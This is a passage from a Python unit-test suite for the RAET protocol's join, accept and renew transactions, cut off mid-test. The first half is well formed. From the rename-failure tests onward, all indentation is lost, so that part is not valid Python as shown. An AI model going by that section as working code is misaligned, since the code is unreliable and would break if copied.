        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemote, remoteData))
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        # Accept the transaction
        console.terse("\nAccept Transaction **************\n")
        beta.keep.acceptRemote(betaRemote)
        self.serviceStacks([alpha, beta], duration=3.0)
        # After acceptance the join completes on both sides
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            self.assertEqual(len(stack.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 1)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemote, remoteData))
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Teardown: release sockets and keep files
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousPendingPendNewFuid(self):
        '''
        Test mutable joiner pend pending non vacuous join with updated fuid/reid (M5)
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewFuid.__doc__))
        # Mode: Never
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value
        # Vacuous: No
        # Pre-create beta's remote for alpha so the join is non-vacuous
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): stack=beta looks like a copy/paste slip (this remote
        # is registered on alpha below) -- confirm it is harmless
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Pending
        beta.keep.pendRemote(betaRemote)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Either
        # Nuid: Old
        # Fuid: New:
        # 1. Initiate join with initFuid
        # 2. Update betaRemote.fuid = fakeFuid
        # 3. Accept alpha responce:
        #    - alpha will respond with initFuid
        #    - beta will know fakeFuid
        initFuid = alphaRemote.nuid
        fakeFuid = initFuid + 10
        # Leid: Old
        # Reid: Either
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        # Snapshot expected post-hack state (same as betaRemote but fakeFuid)
        keep = self.copyData(betaRemote, fuid=fakeFuid)
        # Mutable: Yes
        beta.mutable = True
        # Ensure remote status is Pending
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Test
        console.terse("\nJoin Transaction **************\n")
        beta.join(uid=betaRemote.nuid)
        # Overwrite the fuid after the join packet is queued so the accept
        # response carries the original (init) fuid
        betaRemote.fuid = fakeFuid
        self.serviceStacks([alpha, beta], duration=0.50)
        # Action: Pend, Dump
        for stack in [alpha, beta]:
            # self.assertEqual(len(stack.transactions), 1) #b=0
            # NOTE(review): these two checks use beta, not the loop var
            # 'stack' -- confirm intent
            self.assertEqual(len(beta.remotes), 1)
            self.assertEqual(len(beta.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        # Mutable joiner restored the fuid from the response; role/keys kept
        self.assertFalse(self.sameAll(betaRemote, keep))
        self.assertTrue(self.sameRoleKeys(betaRemote, keep))
        self.assertEqual(betaRemote.fuid, initFuid)
        self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemote, remoteData))
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        # Accept the transaction
        console.terse("\nAccept Transaction **************\n")
        beta.keep.acceptRemote(betaRemote)
        self.serviceStacks([alpha, beta], duration=3.0)
        # After acceptance the join completes on both sides
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            self.assertEqual(len(stack.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 1)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemote, remoteData))
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Teardown: release sockets and keep files
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousPendingPendNewRole(self):
        '''
        Test mutable joiner pend pending non vacuous join with updated role (M6)
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewRole.__doc__))
        # Mode: Never
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value
        # Vacuous: No
        # Pre-create beta's remote for alpha so the join is non-vacuous
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): stack=beta looks like a copy/paste slip (this remote
        # is registered on alpha below) -- confirm it is harmless
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Pending
        beta.keep.pendRemote(betaRemote)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Either
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: New
        oldRole = alpha.local.role
        newRole = '{0}_new'.format(oldRole)
        alpha.local.role = newRole
        # Keys: Either
        # Sameness: Not sameall
        # Snapshot pre-join state; join will update the role so not sameall
        keep = self.copyData(betaRemote)
        # Mutable: Yes
        beta.mutable = True
        # Ensure remote status is Pending
        roleData = beta.keep.loadRemoteRoleData(oldRole)
        self.assertEqual(roleData['role'], oldRole)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Ensure beta knows nothing about the newRole
        roleData = beta.keep.loadRemoteRoleData(newRole)
        self.assertEqual(roleData['role'], newRole)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid, duration=0.50)
        # Action: Pend, Dump
        for stack in [alpha, beta]:
            # self.assertEqual(len(stack.transactions), 1) #b=0
            # NOTE(review): these two checks use beta, not the loop var
            # 'stack' -- confirm intent
            self.assertEqual(len(beta.remotes), 1)
            self.assertEqual(len(beta.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        # Mutable joiner adopted the new role; role keys differ from snapshot
        self.assertFalse(self.sameAll(betaRemote, keep))
        self.assertFalse(self.sameRoleKeys(betaRemote, keep))
        self.assertEqual(betaRemote.role, newRole)
        self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemote, remoteData))
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        # Accept the transaction
        console.terse("\nAccept Transaction **************\n")
        beta.keep.acceptRemote(betaRemote)
        self.serviceStacks([alpha, beta], duration=3.0)
        # After acceptance the join completes on both sides
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            self.assertEqual(len(stack.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 1)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemote, remoteData))
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Teardown: release sockets and keep files
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousPendingPendSameAll(self):
        '''
        Test mutable joiner pend pending non vacuous join with same all (N1)
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendSameAll.__doc__))
        # Mode: Never
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value
        # Vacuous: No
        # Pre-create beta's remote for alpha so the join is non-vacuous
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): stack=beta looks like a copy/paste slip (this remote
        # is registered on alpha below) -- confirm it is harmless
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Pending
        beta.keep.pendRemote(betaRemote)
        # Name: Old
        # Main: Old
        # Kind: Old
        # RHA: Old
        # Nuid: Old
        # Fuid: Old
        # Leid: Old
        # Reid: Old
        # Role: Old
        # Keys: Old
        # Sameness: SameAll
        # Snapshot: nothing changes, so betaRemote must stay sameall with it
        keep = self.copyData(betaRemote)
        # Mutable: Yes
        beta.mutable = True
        # Ensure remote status is Pending
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemote.nuid, renewal=True, duration=0.50)
        # Action: Pend, Dump
        for stack in [alpha, beta]:
            # self.assertEqual(len(stack.transactions), 1) #b=0
            # NOTE(review): these two checks use beta, not the loop var
            # 'stack' -- confirm intent
            self.assertEqual(len(beta.remotes), 1)
            self.assertEqual(len(beta.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemote, remoteData))
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        # Accept the transaction
        console.terse("\nAccept Transaction **************\n")
        beta.keep.acceptRemote(betaRemote)
        self.serviceStacks([alpha, beta], duration=3.0)
        # After acceptance the join completes on both sides
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            self.assertEqual(len(stack.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 1)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemote, remoteData))
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Teardown: release sockets and keep files
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousImmutableRefuseRenew(self):
        '''
        Test immutable joiner don't start (refuse) vacuous renew (Z1)
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousImmutableRefuseRenew.__doc__))
        alpha, alphaData = self.bootstrapStack(name='alpha',
                                               ha=("", raeting.RAET_PORT),
                                               main=True,
                                               auto=raeting.AutoMode.always.value,
                                               role=None,
                                               kind=None,
                                               mutable=True, )
        # NOTE(review): assertIs with a str literal relies on CPython string
        # interning; assertEqual would be the robust choice -- confirm
        self.assertIs(alpha.local.role, 'alpha')
        self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
        self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
        beta, betaData = self.bootstrapStack(name='beta',
                                             ha=("", raeting.RAET_TEST_PORT),
                                             main=None,
                                             auto=raeting.AutoMode.always.value,
                                             role=None,
                                             kind=None,
                                             mutable=True, )
        self.assertIs(beta.local.role, 'beta')
        self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
        self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
        # Do initial join vacuous join to setup rejoin with renew
        # create remote to join to alpha
        remote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0, # vacuous join
                                                      sid=0, # always 0 for join
                                                      ha=alpha.local.ha))
        self.join(beta, alpha, deid=remote.uid)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, True)
                self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        # Python 2 style: dict.values() returns a list, so indexing works
        alphaRemoteBeta = alpha.remotes.values()[0]
        betaRemoteAlpha = beta.remotes.values()[0]
        # save the current state of beta stack remote for alpha
        betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
        # move alpha stack remote for beta to different uid (nuid) to force renew
        oldUid = alphaRemoteBeta.uid
        alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
        self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
        self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
        # Status: Accepted
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Either
        # Keys: Either
        # Sameness: Any
        # Mutable: No
        beta.mutable = False
        beta.clearStats()
        alpha.clearStats()
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
        # Action: Refuse
        # The immutable joiner must refuse the renew request
        self.assertIn('joiner_rx_renew', beta.stats)
        self.assertEqual(beta.stats['joiner_rx_renew'], 1)
        self.assertIn('join_renew_unallowed', beta.stats)
        self.assertEqual(beta.stats['join_renew_unallowed'], 1)
        self.assertIn('stale_nuid', alpha.stats)
        self.assertEqual(alpha.stats['stale_nuid'], 1)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertIs(alphaRemoteBeta.joined, True) # Alpha got no response after renew request
        self.assertIs(betaRemoteAlpha.joined, None)
        self.assertIs(beta.mutable, False)
        self.assertTrue(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
        self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.accepted.value)
        # Check remote dump with pended data
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIsNot(remoteData, None)
        self.assertIs(remoteData['fuid'], oldUid) # renew was refused
        self.assertEqual(remoteData['role'], alpha.local.role)
        self.assertEqual(remoteData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Teardown: release sockets and keep files
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentNonMainRejectJoin(self):
        '''
        Test non main joinent reject join (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentNonMainRejectJoin.__doc__))
        alpha, beta = self.bootstrapStacks()
        # A non-main stack must not accept join correspondences
        alpha.main = False
        # Test
        self.join(beta, alpha)
        # Action: nack reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            # NOTE(review): per the len == 0 assertions below, remotes is
            # empty here, so this inner loop body never executes -- dead
            # assertions; confirm and consider removing
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
        # The rejected join removes the remotes on both sides
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 0)
        self.assertEqual(len(beta.nameRemotes), 0)
        self.assertIs(alpha.mutable, None)
        self.assertIs(beta.mutable, None)
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        allRemoteData = alpha.keep.loadAllRemoteData()
        self.assertEqual(len(allRemoteData), 0)
        # Check role/keys dump
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        # Teardown: release sockets and keep files
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinentJoinRenameRemoteFail(self):
'''
Test joinent join renameRemote() call fail (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinRenameRemoteFail.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
alpha.mutable = True
alpha.nameRemotes['beta_wrong'] = alpha.nameRemotes[beta.name]
del alpha.nameRemotes[beta.name]
beta.name = 'beta_new'
# Test
self.join(beta, alpha)
# Action: nack reject
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinRejectNameConflict(self):
'''
Test joinent join non unique name fail (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinRejectNameConflict.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
# Create another one stack
gammaData = self.createRoadData(base=self.base,
name='gamma',
ha=("", 7532),
main=None,
auto=raeting.AutoMode.always.value)
keeping.clearAllKeep(gammaData['dirpath'])
gamma = self.createRoadStack(data=gammaData)
self.join(gamma, alpha)
self.assertTrue(gamma.remotes.values()[0].joined)
# Rename gamma to 'beta'
alpha.mutable = True
gamma.name = 'beta'
# Test
self.join(gamma, alpha)
# Action: nack reject
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptRejectNameConflict(self):
'''
Test joiner.join rejects rename if such name is already registered (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptRejectNameConflict.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
fakeRemote = beta.addRemote(
estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
name='alpha_new',
ha=(alpha.local.ha[0], alpha.local.ha[1] + 10)))
alpha.name = 'alpha_new'
beta.mutable = True
# Test
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: nack reject
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptRejectRenameFail(self):
'''
Test joiner reject rename if renameRemote() fail (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptRejectRenameFail.__doc__))
# Status: Accepted (auto accept keys)
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
beta.mutable = True
# Following will produce rename fail
beta.nameRemotes['alpha_wrong'] = beta.nameRemotes[alpha.name]
del beta.nameRemotes[alpha.name]
alpha.name = 'alpha_new'
# Test
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: nack reject
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptErrorParseInner(self):
'''
Test joiner.accept got error on parsing packet inner (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptErrorParseInner.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept parseInner error *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set incorrect coat kind
data['ck'] = -1
# skip actual joinent.join, it's not needed for test
joinent.ackAccept()
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('parsing_inner_error', beta.stats)
self.assertEqual(beta.stats['parsing_inner_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingName(self):
'''
Test joiner.accept packet has no name (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingName.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing name *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set stack name to None
alpha.local.name = None
# Skip actual join, it's not needed for test
joinent.ackAccept()
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingMode(self):
'''
Test joiner.accept packet has no mode (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingMode.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing mode *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
